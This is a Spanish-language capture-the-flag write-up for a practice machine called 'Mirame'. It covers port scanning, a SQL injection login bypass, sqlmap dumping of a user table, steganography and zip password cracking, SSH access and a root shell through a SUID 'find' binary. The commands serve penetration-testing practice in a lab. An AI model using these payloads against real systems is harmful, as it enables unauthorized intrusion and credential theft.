# Mirame

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.17.0.2
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEhYrFMrsspAx4abCVuga%2Fimage.png?alt=media&#x26;token=ece3cdd3-3a35-4f81-a74d-d66d259ba148" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F88IIRnOhG2nPPllbScz8%2Fimage.png?alt=media&#x26;token=ae651d1f-b4d8-440b-8f34-f7f00812eb36" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 172.17.0.2
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FYKFkLySGXxcMRVlTXqeK%2Fimage.png?alt=media&#x26;token=60892493-493f-4f61-97b3-a4d169c3c07e" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web sea un panel de Login.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FKaeLYtTcyXzFlhOD3Zje%2Fimage.png?alt=media&#x26;token=2dcbc6a8-9d60-4078-96f6-1cb7f36f2d04" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Probamos con credenciales básicas y nada pero con una inyección básica si tenemos suerte.

```bash
'or 1=1-- -
```

Tras esto nos sale este panel en que si ingresas algo te sale la temperatura.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FHhk68ZSXDcCfg5BP3tqb%2Fimage.png?alt=media&#x26;token=affdc74e-14c0-429f-893c-dcac90fb7614" alt=""><figcaption></figcaption></figure>

Vamos a probar con **sqlmap** para ver que bases de datos hay.

```bash
sqlmap -u "http://172.17.0.2/index.php" --forms --batch --dbs
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F7xB4a3YNwRipJ6iMDVNy%2Fimage.png?alt=media&#x26;token=6c5efeb9-37fe-45ff-8990-6a55f9539139" alt=""><figcaption></figcaption></figure>

Ahora vemos el contenido de la base de datos **users**.

```bash
sqlmap -u "http://172.17.0.2/index.php" --forms --batch -D users --tables
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F2LW3V1wfVxk5Sa92MaI3%2Fimage.png?alt=media&#x26;token=700cbe7b-4f30-467e-a6ba-d8e0f182107b" alt=""><figcaption></figcaption></figure>

Ahora vemos el contenido de la tabla de **usuarios**.

```bash
sqlmap -u "http://172.17.0.2/index.php" --forms --batch -D users -T usuarios --dump
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FbfJHvdSTpyIwBw2QAq4q%2Fimage.png?alt=media&#x26;token=86c714f2-eecf-419d-b333-47fb28cfef9a" alt=""><figcaption></figcaption></figure>

Vemos que hay un usuario llamado **directorio** con la contraseña **directoriotravieso** suponemos que es un directorio por lo que miramos a ver.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F430V90d0OwUMqak02i36%2Fimage.png?alt=media&#x26;token=e8befc78-d3eb-4ee0-94a7-57e3e77639ea" alt=""><figcaption></figcaption></figure>

Nos descargamos la imagen para ver si se puede usar la esteganografía. Usamos esta herramienta ya que contiene una contraseña.

```
stegcracker miramebien.jpg /usr/share/wordlists/rockyou.txt
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FkJETHXLavIVT981GCOml%2Fimage.png?alt=media&#x26;token=226065ad-696e-4d69-bdcb-17dd10853ab7" alt=""><figcaption></figcaption></figure>

Miramos que contiene la imagen escondido.

```bash
steghide extract -sf miramebien.jpg
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FvzqxJJHMHuI4vGQsBcfe%2Fimage.png?alt=media&#x26;token=a80529ad-bcd4-4b3a-9ca3-210437b0b5e4" alt=""><figcaption></figcaption></figure>

Vemos que hay un archivo comprimido llamado **ocultito.zip** pero al descomprimirlo nos pide una contraseña. Por lo que usamos **John**.

```bash
zip2john ocultito.zip > hash
```

Usamos **John** para obtener la contraseña.

```bash
john hash
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FIHWfb4rap7xX6SJEBkwK%2Fimage.png?alt=media&#x26;token=2dde8c3c-4d77-4d39-8568-96e1c3896412" alt=""><figcaption></figcaption></figure>

Descomprimimos ahora sí el `.zip`.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FD5uwIyoqbjPKd9uZS7hx%2Fimage.png?alt=media&#x26;token=cc870c9a-cd57-4be1-81e4-26fa0e7f0491" alt=""><figcaption></figcaption></figure>

Conseguimos unas credenciales.

```bash
ssh carlos@172.17.0.2
```

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar. No tenemos permisos **SUDO**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FBoxlT5ZQXm9KENGkR6Xs%2Fimage.png?alt=media&#x26;token=bb4da056-21db-4905-9ed4-37a996b334b5" alt=""><figcaption></figcaption></figure>

Buscamos permisos **SUID**.

```bash
find / -perm -4000 2>/dev/null
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FojD5FbxCEAJQlaC6rCGQ%2Fimage.png?alt=media&#x26;token=bf800001-807a-41cb-a397-5255b904494a" alt=""><figcaption></figcaption></figure>

Nos llama la atención **find** por lo que buscamos en esta [página ](https://gtfobins.github.io/gtfobins/find/)cómo explotarlo.

```bash
/usr/bin/find . -exec /bin/sh -p \; -quit
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FXVlzN7a61MPONBK2w7xi%2Fimage.png?alt=media&#x26;token=29990c9d-6f86-456a-9590-bcced0d55f1a" alt=""><figcaption></figcaption></figure>